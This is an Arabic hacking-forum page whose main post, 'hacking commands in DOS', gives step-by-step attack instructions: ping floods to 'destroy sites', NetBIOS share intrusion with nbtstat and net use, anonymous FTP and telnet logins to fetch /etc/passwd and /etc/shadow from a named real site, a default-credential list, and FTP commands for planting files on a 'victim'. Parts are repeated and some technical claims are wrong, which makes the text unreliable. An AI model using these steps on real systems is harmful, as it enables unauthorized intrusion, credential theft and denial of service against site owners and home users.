منتديات الجنرال صدام الشرعبي لي الهكرز والاختراقات
عزيزي الزائر عزيزتي الزائرة يرجي التكرم بتسجبل الدخول
لي اجل تستطيع اطهار جميع المواضيع والاقسام
اذا كنت عضو معنا

او التسجيل ان لم تكن عضو وترغب في الانضمام الي المنتدي

نتشرف بتسجيل

ادارة المنتدى

منتديات الجنرال صدام الشرعبي لي الهكرز والاختراقات

منتديات الجنرال صدام الشرعبي لي الهكرز والاختراقاأكبر منتدى هكر عربي متخصص بجديد الثغرات واختراق المواقع والأجهزة.منتدى إختراق البريد والايميلات- قسم اختراق دورة إحتراف التلغيمدورة اختراق IPs من نوع SIPو VOIP‎دورة كشف التلغيم‎دورة اختراق الأجهزة‎دورة
 
الرئيسيةالتسجيلدخول


تحياتي لك الباب مفتوح لي في جميع الاقسام الذي تريده عند المشاركه  اي استفسار انا جاهز ان شاء الله
بحـث
 
 

نتائج البحث
 
Rechercher بحث متقدم
سحابة الكلمات الدلالية
المواضيع الأخيرة
» عملاق التحميل من التورنت Vuze 5.6.0.0 الجديد كليا واحدث الادوات والاصدرات
السبت مارس 07, 2015 11:36 am من طرف ٱ‏ٱلجنرٱل صدٱٱم ٱلشرعبيے

» برنامج FastPictureViewer 1.9 Build 342 لتعديل و عرض الصور بكل سهوله
الأربعاء مارس 04, 2015 3:57 pm من طرف ٱ‏ٱلجنرٱل صدٱٱم ٱلشرعبيے

» احدث فلود اضافات روم 2015
الأربعاء مارس 04, 2015 10:20 am من طرف ٱ‏ٱلجنرٱل صدٱٱم ٱلشرعبيے

» ]VB6[ أفضل الطرق لتجميل برامجك شبكة الجنرال صدام الشرعبي
الثلاثاء مارس 03, 2015 10:58 am من طرف ٱ‏ٱلجنرٱل صدٱٱم ٱلشرعبيے

» الدرس الثالث -الجمل الشرطية و الدوارات شبكة الجنرال صدام الشرعبي
الثلاثاء مارس 03, 2015 10:55 am من طرف ٱ‏ٱلجنرٱل صدٱٱم ٱلشرعبيے

» الدرس الثاني -المتغيرات شبكة الجنرال صدام الشرعبي
الثلاثاء مارس 03, 2015 10:53 am من طرف ٱ‏ٱلجنرٱل صدٱٱم ٱلشرعبيے

» ]#C[ الدرس الاول تعلم خطوة بخطوة , مع الإجابة عن أي سؤال شبكة الجنرال صدام الشرعبي
الثلاثاء مارس 03, 2015 10:52 am من طرف ٱ‏ٱلجنرٱل صدٱٱم ٱلشرعبيے

» ]C#[ الخطوه الثانية اضافةالبيانات بالـ LINQ شبكة الجنرال صدام الشرعبي
الثلاثاء مارس 03, 2015 10:47 am من طرف ٱ‏ٱلجنرٱل صدٱٱم ٱلشرعبيے

» ]C#[ الخطوه الاولى لأستيعاب الـ LINQ شبكة الجنرال صدام الشرعبي
الثلاثاء مارس 03, 2015 10:45 am من طرف ٱ‏ٱلجنرٱل صدٱٱم ٱلشرعبيے

» ]#C[ عمل برامج للاجهزه النقاله والPDA‏ شبكة الجنرال صدام الشرعبي
الثلاثاء مارس 03, 2015 10:41 am من طرف ٱ‏ٱلجنرٱل صدٱٱم ٱلشرعبيے

» تطبيق لزيادة سرعة الجهاز Greenify )ROOT( v2.5.2 Final‏ شبكة الجنرال صدام الشرعبي
الثلاثاء مارس 03, 2015 10:29 am من طرف ٱ‏ٱلجنرٱل صدٱٱم ٱلشرعبيے

» برنامج Auslogics BoostSpeed 7.8.1.0 لتسريع الكمبيوتر وعمل صيانة شاملة له
الثلاثاء مارس 03, 2015 10:25 am من طرف ٱ‏ٱلجنرٱل صدٱٱم ٱلشرعبيے

» افضل واقوى البرامج لاستعادة جميع ملفاتك المحذوفه iOrgSoft Data Recovery 1.0.6 شبكة الجنرال صدام الشرعبي
الإثنين مارس 02, 2015 5:29 pm من طرف ٱ‏ٱلجنرٱل صدٱٱم ٱلشرعبيے

ديسمبر 2017
الإثنينالثلاثاءالأربعاءالخميسالجمعةالسبتالأحد
    123
45678910
11121314151617
18192021222324
25262728293031
اليوميةاليومية
التبادل الاعلاني

انشاء منتدى مجاني



أفضل 10 فاتحي مواضيع
ٱ‏ٱلجنرٱل صدٱٱم ٱلشرعبيے
 
جنـرال الـهكـر
 
رابح..زيرؤ.فؤر.ايفر
 
ابوعلي
 
سنايبر1
 
ملك الهكر
 
العاشق
 
الساحر
 
__alsafa7__
 
صدام الشرعبي
 
أفضل 10 أعضاء في هذا المنتدى
ٱ‏ٱلجنرٱل صدٱٱم ٱلشرعبيے - 1848
 
رابح..زيرؤ.فؤر.ايفر - 300
 
جنـرال الـهكـر - 227
 
سنايبر1 - 146
 
ابوعلي - 55
 
العاشق - 49
 
نسيـم البحـر1 - 27
 
ملك الهكر - 27
 
لووورد اليمن - 24
 
__alsafa7__ - 18
 
تسجيل صفحاتك المفضلة في مواقع خارجية
تسجيل صفحاتك المفضلة في مواقع خارجية digg  تسجيل صفحاتك المفضلة في مواقع خارجية delicious  تسجيل صفحاتك المفضلة في مواقع خارجية reddit  تسجيل صفحاتك المفضلة في مواقع خارجية stumbleupon  تسجيل صفحاتك المفضلة في مواقع خارجية slashdot  تسجيل صفحاتك المفضلة في مواقع خارجية yahoo  تسجيل صفحاتك المفضلة في مواقع خارجية google  تسجيل صفحاتك المفضلة في مواقع خارجية blogmarks  تسجيل صفحاتك المفضلة في مواقع خارجية live      

http://sadam-alsharabi.roo7.biz

قم بحفض و مشاطرة الرابط منتديات الجنرال صدام الشرعبي لي الهكرز والاختراقات على موقع حفض الصفحات
تصويت
احصائيات
هذا المنتدى يتوفر على 2282 عُضو.
آخر عُضو مُسجل هو goran فمرحباً به.

أعضاؤنا قدموا 3049 مساهمة في هذا المنتدى في 2052 موضوع

شاطر | 
 

 اوامر الاختراق في الدوس

استعرض الموضوع السابق استعرض الموضوع التالي اذهب الى الأسفل 
كاتب الموضوعرسالة
ٱ‏ٱلجنرٱل صدٱٱم ٱلشرعبيے

avatar

السٌّمعَة : 47
تاريخ التسجيل : 19/11/2012
العمر : 27
الموقع : https://m.facebook.com/profile.php?id=465134066889659

مُساهمةموضوع: اوامر الاختراق في الدوس   الجمعة مايو 02, 2014 12:11 pm

السلام عليكم 
هذا الموضوع خطير جدا أرجو عدم الأستخدام ضد المسلمين


اخطر واغرب الأوامر بالجوس للهكر:
لتدمير المواقع:
ping -t [/b]www.***.com
هذا الأمر يقوم بالضغط على المضيف
ping -t -a -f 
www.***.com
اهاه هذا الأمر الشاطر ويقوم باعطاء الاوامر للمستضيف 
ping 
www.***.com
وهذا الأمر يقوم باعطاءك اي بي الموقع ويستخدم الاي بي للتدمير مثلاً بينج بعدها الاي بي
com/com.wav
com3/com3/.wav
com1/com.wav
وهذا الاوامر للهجزم اكتب الموقع وهذا الامر ولا الاي بي يكون افضل
ping -w timeout 
www.***.com
وهذا الامر يستعمل لمعرفة سرعة المواقع 
NETSTAT -S
هذي المنافذ في جهازك
NETSTAT -A
هذا الامر لترا المنافذ ومن مرتبط معك بالبروتكل يعني تشوف من يحاول يخترقك
NETSTAT -N
هذا الامر لأخراج الاي بي ارسل اي ملف لمن معاك على الماسنجر وهو يحمل اكتبة بيجيك الاي بي اخر شي على اليمين هذا هو واخر شي على اليسار يوو يعني انت
NETSTAT -P
هذا منافذ البروتكوكل
drwatson
هذا الامر لأخفاء الاي بي
والان هذا اوامر خطيرة
الإختراق عن طريق NetBios Attack 

هذه الثغرة تظهر بصورة خاصة إذا ما كان لديك Home Network أو أى نوع اخر من أنواع الشبكات مثل LAN أو WAN أو MAN وغيرها ، أيضا يمكن إختراق حاسبك الشخصى إذا كانت لديك تلك الثغرة.
وللتجربة على نفسك كمثال : إحصل على IP الخاص بجهازك بواسطة ذلك البرنامج الصغير المحمل في المرفقات مثلا .
1- بعد حصولك على IP سيظهر بالشكل التالى 207.107.1.1 ( هذا الرقم إفتراضى).

2- الان إذهب الى START ثم RUN ثم إكتب CMD لتفتح لك شاشة الدوس .

3- إكتب داخل شاشة الدوس Nbtstat –A IP ADRESS : لا تنسى أن تكتب IP الخاص بك مكان IP ADRESS ، ثم إضغط ENTER .

4- سيظهر لك الجدول التالى :
NetBIOS Remote Machine Name Table
____________________________________
Name Type Status
-------------------------------------------
J-1 <00> UNIQUE Registered
WORK <00> GROUP Registered
J-1 <03> UNIQUE Registered
J-1 <20> UNIQUE Registered
WORK <1E> GROUP Registered
WORK <1D> UNIQUE Registered
__MSBROWSE__.<01>GROUP Registered
ملحوظة : تم حذف المعلومات الأصلية من الجدول .

5- الرقم الظاهر ما بين <> يطلق عليه HEX CODE VALUE ، وما يهمنا هنا أن نجد رقم 20 ما بين الأقواس وهذا يعنى أننا لدينا PRINTER OR FILES SHARED TURNED ON ، وهو ما يعنى أننا لدينا شخص لدية ملفات وطابعة يمكن مشاركتها عبر الإنترنت وهذا عيب خطير في أنظمة التشغيل وثغرة خطيرة يمكن إستغلالها في إختراقه.

6- الان يمكنك التعرف على الملفات التى يمكن مشاركتها أو التغيير فيها والتلاعب بها كيفما تشاء وذلك بكتابة الأمر التالى في شاشة الدوس:
Net view \\

7- سوف يظهر لك الجدول التالى الذى يدل على وجود الملفات التى يمكن التلاعب فيها :
Shared resources at \\ip_address
Sharename Type Comment
MY DOCUMENTS Disk
TEMP Disk

8- الان يمكنك الدخول الى ملف TEMP والتلاعب فيه :
Net use x: \\\temp

طبعا إسلوب NSETBIOS مر بالعديد من التطورات ، نظرا لأن العديد من المستخدمين وأنظمة التشغيل قد تلافوا هذه الثغرة الخطيرة لديهم ، بإذن الله سأقدم الطرق الأخرى الأكثر تطورا في وقت لاحق ..
* لكي تستطيع اختراق موقع لا بد أن تعرف اسم المستخدم وكلمة المرور الخاصة بالموقع 

User name-Password 

وهما يكونان محفوظين في ملف يسمي 

PASSWD غالبا 

بعض المواقع تضع هذا الملف في الإف تي بي 

ما هو إف تي بي؟ 

FTP=File Transfer Protocol بروتوكول نقل الملفات 

تستطيع الاتصال بالموقع وسحب هذا الملف عن طريق التلنت 

start==>run إبدأ ثم تشغيل 

واكتب telnet 

سيفتح التلنت اضغط علىRemote System ==> connect 

ثم اكتب الموقع في Host Name مثلا 

kahane.org أو الآيبي الخاص به 

وفي PORT اكتب 21 وهو البورت الخاص بالإف تي بي 

ثم اضغط connect 

وبعد أن يظهر رد السيرفر اكتب ولكن..لن ترى ما كتبت!! شفرة source code 

user anonymous 

ثم انتر بعدها يطلب السيرفر كلمة السر اكتب 

pass 
[email=//zzzoozz@yahoo.com]zzzoozz@yahoo.com[/email] 

اكتب أي بريد ككلمة سر وطبعا سيكون وهميا 

ماذا فعلنا؟لقد دخلنا إلى سيرفر الموقع في وضع التخفي وبعض المواقع تسمح بهذه الخاصية وبعضها لا يسمح.. 

بعدها سنحصل على ملف الباسوورد 

قبل ذلك أحب أن أذكر أنه يمكنك عمل الأشياء السابقة عن طريق أي برنامج إف تي بي مثل 

cute ftp - ws_ftp 

مثلاأو حتى الذهاب إلى المتصفح وكتابة الموقع هكذا في حقل العنوان 

ftp.kahane.org 

لتحصل على الملف في التلنت اكتب 

retr /etc/passwd 

/etc هو المجلد الذي يحتوي الملف passwd ويختلف اسم المجلد واسم ملف الباسوورد باختلاف نظام تشغيل الموقع 

Sunos 5.0 etc/shadow او etc/passwd 
Linux etc/shadow او etc/passwd 
BSD4.3 –RENO etc/master.passwd 
AIX etc/security/passwd 
NT ويندوز *******/passwd 

وتختلف أسماء ملف الباسوورد بين passwd و admin.pwl و غيرها 
طريقة تغيير امتداد exe عن طريق الدوس جديد 
7
7
7
7
7
يتبع 



Anonymous user logged in. 
مبرووووك انت الحين في جهاز المسكين ذا الي بتحوسه 
ما عليك الآن الا ان تقوم بإستعمال 
اوامر الفتيبي 
و طبعا لن امر عليها مرور الكرام لكي لا تقعو في المشكلة الي وقعت فيها و هي نجاح الإقتحام من دون ما أعرف و لا فكرة على اوامر الفتيبي و إذا اردتم ان تضحكو بقاليأكثر من 20 دقيقة و انا مجمد الإيدي و الضحية عالقة من دون أن أعمل أي شيء وعشان كذا 
قمت وجبت الاوامرعشان تطبقوها مباشرةا بعد نجاح الاختراق 

Pwd 
لكي تعر ما يحتويه الهارد ديسك 
Cd 
لإقتحام مجلد مثال 
Cd black 
في هدا المثال قمت بإقتحام مجلد المسمى بلاك 
Ls 
لكي يتضح لك محتوى المجلد أو الهارد ديسك 
Get 
لكي تحمل الى سطح المكتب بتاع جهازك 
مثال 
Get black.exe 
Put 
العملية الع**ية ل 
Get 
يعني ان تأخد ملف من سطح المكتب بتاع جهازك و تضعه في 
في جهاز الضحية 
مثال 
Put black.exe 
Clos 
لقطع الإتصال مع الضحية 


هذا أهم الأوامر والحين ابعلمكم على أنواع الرسائل الي نتحصل عليها من جهاز الضحية مع تطبيق الأوامر و شرحها و ارقامها 
Codes: Signification: 
110 Restart marker reply. 
120 Service ready in nnn minutes. (nnn est un temps) 
125 Data connection already open; transfer starting. 
150 File status oka about to open data connection. 
200 Command okay. 
202 Command not implemented, superfluous at this site. 
211 System status, or system help reply. 
212 Directory status. 
213 File status. 
214 Help message. 
215 NAME system type. 
220 Service ready for new user. 
221 Service closing control connection. 
225 Data connection open; no transfer in progress. 
226 Closing data connection. 
227 Entering passive mode (h1, h2, h3, h4, p1, p2). 
230 User logged in, proceed. 
250 Requested file action okay, completed. 
257 \"PATHNAME\" created. 
331 User name okay, need password. 
332 Need account for login. 
350 Requested file action pendingfurther information. 
421 Service not available, closing control connection. 
425 Can\'t open data connection. 
426 Connection closed; transfer aborded. 
450 Requested file action not taken. (Fichier déjà utilisé par autre chose) 
451 Requested action aborded: local error processing. 
452 Requested action not taken. (Pas assez de mémoire pour exécuter l\'action) 
500 Syntax error, command unrecognized. 
501 Syntax error in parameters or arguments. 
502 Command not implemented. 
503 Bad sequence of commands. 
504 Command not implemented for that parameter. 
530 Not logged in. 
532 Need account for storing files. 
550 Requested action not taken. (Fichier non trouvé, pas d\'accès possible,...) 
551 Requested action aborded: page type unknown. 
552 Requested file action aborded. 
553 Requested action not taken. (Nom de fichier non attribué) 

7
7
7
7
7
7
7
يتبع


ولها نفس الفكرة بحيث تقوم بالاتصال بجهاز على اساس انه سيرفر بإمكانك حذف إضافة إزالة الملفات فيه ... 
تتم أيضا بنفس الطريقة من متصفحك اكتب 
telnet://IPNumberort حيث أن IPNumber هو رقم الآي بي الخاص بالضحية اما port هو رقم المنفذ القابل لإجراء التيل نت عليه وهو يفترض أن يكون أحد المنافذ التالية : 
21 - 25 - 32(الأساسي) - 99 - 2001 
والعديد العديد من المنافذ الأخرى وهذه فقط على سبيل المثال 

7
7
7
7
7
7
يتبع .......

ولها نفس الفكرة بحيث تقوم بالاتصال بجهاز على اساس انه سيرفر بإمكانك حذف إضافة إزالة الملفات فيه ... 
تتم أيضا بنفس الطريقة من متصفحك اكتب 
telnet://IPNumberort حيث أن IPNumber هو رقم الآي بي الخاص بالضحية اما port هو رقم المنفذ القابل لإجراء التيل نت عليه وهو يفترض أن يكون أحد المنافذ التالية : 
21 - 25 - 32(الأساسي) - 99 - 2001 
والعديد العديد من المنافذ الأخرى وهذه فقط على سبيل المثال 
================== 
3 ــ اختراق المواقع : 
يجب أن يكون في الموقع منفذ قابل للتيل نت(قم باستخدام ShadowSecurityScanner لهذا الغرض) تجده في 
http://packetstorm.securify.com/[b] قم بالضغط على الوصلة التي سوف تظهر لك ثم ابحث عن البرنامج باسمه أو باسم SSS . 
المهم بعد ما تتصل بالتيل نت للموقع حاول أن تدخل باي يوزنيم او باسوورد من التالية أو غيرها : 
اسم المستخدم : كلمة المرور 
anonymous : anonymous 
guest : guest 
root : root 
sys : sys 
sys : sysadm 
sys : system 
games : games 
ftp : ftp 
mail : mail 
وإن لم تنجح(في حال كون نظام التشغيل في السيرفر ينو** Unix ويمكنك معرفته بواسطة البرنامج المذكورة أعلاه) جرب التالية : 
young 
test 
لاحظ أنها غير محمية بكلمة سر وتسمى unpassworded accounts 
أي الحسابات الغير محمية بكلمة سر . 
اكتب الأمر : 
GET /etc/passwd و GET /etc/group و GET /etc/shadow 
ملاحظة : بعد كتابة كل أمر يجب أن تظيف : 
data = download 
لكي تتمكن من التحكم بالملفات . 

7
7
7
7
7
7
يتبع ................
ماهو الملف psswd ? 
الملف ذا فضيحة فيه باسوورد صاحب الموقع ...وباسووردات غيرها بكثير من ظمنها باسوورد الـroot . 
ملاحظة للمبتدئين : الـroot هو الشخص الذي يستطيع التحكم بكل شيء وتخريب وتدمير كل شيء من دون أن يوقفه النظام وبإمكانه أن يكون أي مستخدم على الشبكة بواسطة الأمر su username ولن يحتاج إلى باسوورد . 
هذا الملف في ثلاث حالات : 
1 ــ مغير اسمه وصعبة نبحث لان الملفات الموجودة في الملف etc/ كثيرة جدا . 
2 ــ معمول له shadow وليس هناك طريقة لفك الـshadow أو ما يسمى بـunshadow . 
3 ــ متروك مثل ما هو .. 
لنفترض أنه كان في الحالة الثالثة هل ستجد الباسووردات بسهولة ؟؟ لا وألف لا 
الباسووردات مشفرة ... سوف تراها كالمثال التالي : 
sirhack:89fGc%^7&a, Ty:100:100: Sir Hackalot: /usr/sirhack:/bin/sh 
هنا سوف نعرف المعلومات التالية: 
1 ــ اسم المستخدم : sirhack . 
2 ــ كلمة السر : 89fGc%^7 . 
3 ــ الاسم الحقيقي : Sir Hackalot . 
4 ــ مجلد الحساب : usr/sirhack/ 
5 ــ الغلاف(هنا الكلام في ينو** او لينو**) : bin/sh/ 
كما رأيتم فكلمة السر مشفرة . 
=================================== 
ما هو الملف group ? 
هذا الملف يحوي اسماء المستخدمين مع كلمة السر(مشفرة ثانية) وحالاته نفس حالات الملف passwd إلا أنه لا يغير تسميته . 
=================================== 
ما هو الملف shadow ? 
في حالة كون الملف psswd مشفر سوف نحتاج إلى هذا الملف لانه لن يكون مشفرا ... 

7
7
7
7
7
يتبع ]
الرجوع الى أعلى الصفحة اذهب الى الأسفل
http://sadam-alsharabi.roo7.biz
 
اوامر الاختراق في الدوس
استعرض الموضوع السابق استعرض الموضوع التالي الرجوع الى أعلى الصفحة 
صفحة 1 من اصل 1

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
منتديات الجنرال صدام الشرعبي لي الهكرز والاختراقات :: منتدى مختص بالاختراق عبر طريقه cmd-
انتقل الى: